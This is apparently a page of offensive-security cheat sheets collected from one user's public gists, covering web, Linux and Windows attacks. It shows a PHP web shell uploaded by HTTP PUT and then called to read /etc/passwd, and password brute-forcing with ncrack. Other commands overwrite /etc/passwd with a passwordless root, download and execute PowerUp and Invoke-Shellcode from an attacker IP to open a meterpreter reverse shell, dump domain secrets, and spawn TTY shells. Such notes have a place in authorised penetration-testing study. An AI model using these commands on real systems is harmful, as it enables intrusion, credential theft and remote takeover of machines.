Alexander Castillo alexandercastillo1
alexandercastillo1
/ PlayingWithWebsitesThatWorks.txt
Created
August 11, 2018 15:14
PlayingWithWebsitesThatWorks
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Check PUT options for a bunch of web links | |
| curl -v -X OPTIONS $(cat /root/Desktop/bunchoflinks.txt) | |
| Check PUT options for a web link | |
| curl -v -X OPTIONS http://link/sublink | |
| Inject backdoor on PUT | |
| curl -v -X PUT -d '<?php system($_GET["cmd"]); ?>' http://link/sublink/backdoor.php | |
| calling backdoor | |
| http://link/sublink/backdoor.php?cmd=cat%/etc/passwd |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| nc | |
| Victim: nc -lvp listeningport > shell.php | |
| Attacker: nc target-ip listeningport < shell.php | |
| FTP | |
| Attacker: python -m pyftpdlib -w -p 21 | |
| Victim: ftp attacker-ip - anonymous - anonymous - put or get | |
| FTP (non-interactive) | |
| echo open attacker-ip>ftp.txt |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| **NCRACK (RDP)** | |
| ncrack -vv -U /root/Desktop/Usernames.txt -P /root/Desktop/passwords.txt target-ip:3389 | |
| **NCRACK (SSH)** | |
| ncrack -vv -U /root/Desktop/Usernames.txt -P /root/Desktop/Passwords.txt target-ip:22 | |
| **NCRACK (FTP)** | |
| ncrack -vv -U /root/Desktop/usernames.txt -P /root/Desktop/passwords.txt target-ip:21 | |
| **NCRACK (POP3)** |
alexandercastillo1
/ PrivilegeEscalationThatWorks-Linux.txt
Created
August 10, 2018 23:59
PrivilegeEscalationThatWorks-Linux
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| **/etc/passwd full permissions** | |
| ls -la /etc/passwd (if output is "-rwxrwxrwx") | |
| echo root::0:0:root:/root:/bin/bash > /etc/passwd | |
| su | |
| **SUID LESS / MORE** | |
| less /etc/passwd | |
| !/bin/sh | |
| **SUID Bash** |
alexandercastillo1
/ PrivilegeEscalationThatWorks-Windows.txt
Last active
August 11, 2018 14:45
PrivilegeEscalationThatWorks-Windows
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| **PowerUp/AlwaysInstallElevated** | |
| Scanning | |
| reg query HKCU\SOFTWARE\Policies\microsoft\Windows\Installer /v AlwaysInstallElevated | |
| reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated | |
| Attack | |
| powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://attacker-ip:8000/PowerUp.ps1'); Get-RegistryAlwaysInstallElevated" | |
| powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://attacker-ip:8000/PowerUp.ps1'); Write-UserAddMSI" | |
| (Under user profile the software is installed) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| **psexec** | |
| python psexec.py username:password@target-ip | |
| python psexec.py username:'password'@target-ip | |
| **SecretsDump** | |
| python secretsdump.py -just-dc-ntml domain/username@target-ip | |
| **lookupsid** | |
| python lookupsid.py domain/username:password@target-ip |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| PowerSploit - Code Execution (Reverse Shell using meterpreter) | |
| Invoke-Shellcode | |
| cd /Tools/PowerSploit/CodeExecution/ | |
| python -m SimpleHTTPServer 7001 | |
| cd /Tools/fast_meterpreter.rb | |
| ATTACKERIP - LISTENERPORT - 1 - no - http://ATTACKERIP/WEBSERVERPORT(7001) - | |
| powershell -nop -exec bypass -c "IEX (New-Object Net.Webclient).DownloadString('http://IPADDRESS:7001/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_http -lhost X.X.X.X -lport XXXX -Force" | |
| PowerSploit - Code Execution (Reverse Shell) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| **TTY Shells** | |
| python -c 'import pty; pty.spawn("/bin/sh")' | |
| python -c 'import pty; pty.spawn("/bin/bash")' | |
| echo os.system('/bin/bash') | |
| /bin/sh -i | |
| perl —e 'exec "/bin/sh";' | |
| perl —e 'exec "/bin/bash";' | |
| perl: exec "/bin/sh"; | |
| perl: exec "/bin/bash"; | |
| ruby: exec "/bin/sh" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Finding Hosts | |
| nmap -v -sn X.X.X.X -oG /root/Desktop/hosts.txt | |
| grep Up /root/Desktop/hosts.txt | cut -d " " -f 2 | |
| Scan | |
| unicornscan -i tap0 -mU X.X.X.X:1-65535 | tee /root/Desktop/victim/udp.txt | |
| unicornscan -i tap0 X.X.X.X:1-65535 | tee /root/Desktop/victim/tcp.txt | |
| nmap -A -sV -vvvvv -Pn X.X.X.X -oX /root/Desktop/victim/nmapports.xml -oN /root/Desktop/victim/nmapports.txt | |
| nmap -A -sV -v3 -O -Pn -pU:x,xx,xxx,T:x,xx,xxx --script vuln X.X.X.X -oX /root/Desktop/victim/nmapvulns.xml -oN /root/Desktop/victim/nmapvulns.txt |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| **SMB - Port 139/445** | |
| enum4linux | |
| enum4linux -v target-ip | Verbose mode, shows the underlying commands being executed by enum4linux | |
| enum4linux -a target-ip | Do Everything, runs all options apart from dictionary based share name guessing | |
| enum4linux -U target-ip | Lists usernames, if the server allows it - (RestrictAnonymous = 0) | |
| enum4linux -u administrator -p password -U target-ip | If you've managed to obtain credentials, you can pull a full list of users regardless of the RestrictAnonymous option | |
| enum4linux -r target-ip | Pulls usernames from the default RID range (500-550,1000-1050) | |
| enum4linux -R 600-660 target-ip | Pull usernames using a custom RID range | |
| enum4linux -G target-ip | Lists groups. if the server allows it, you can also specify username -u and password -p |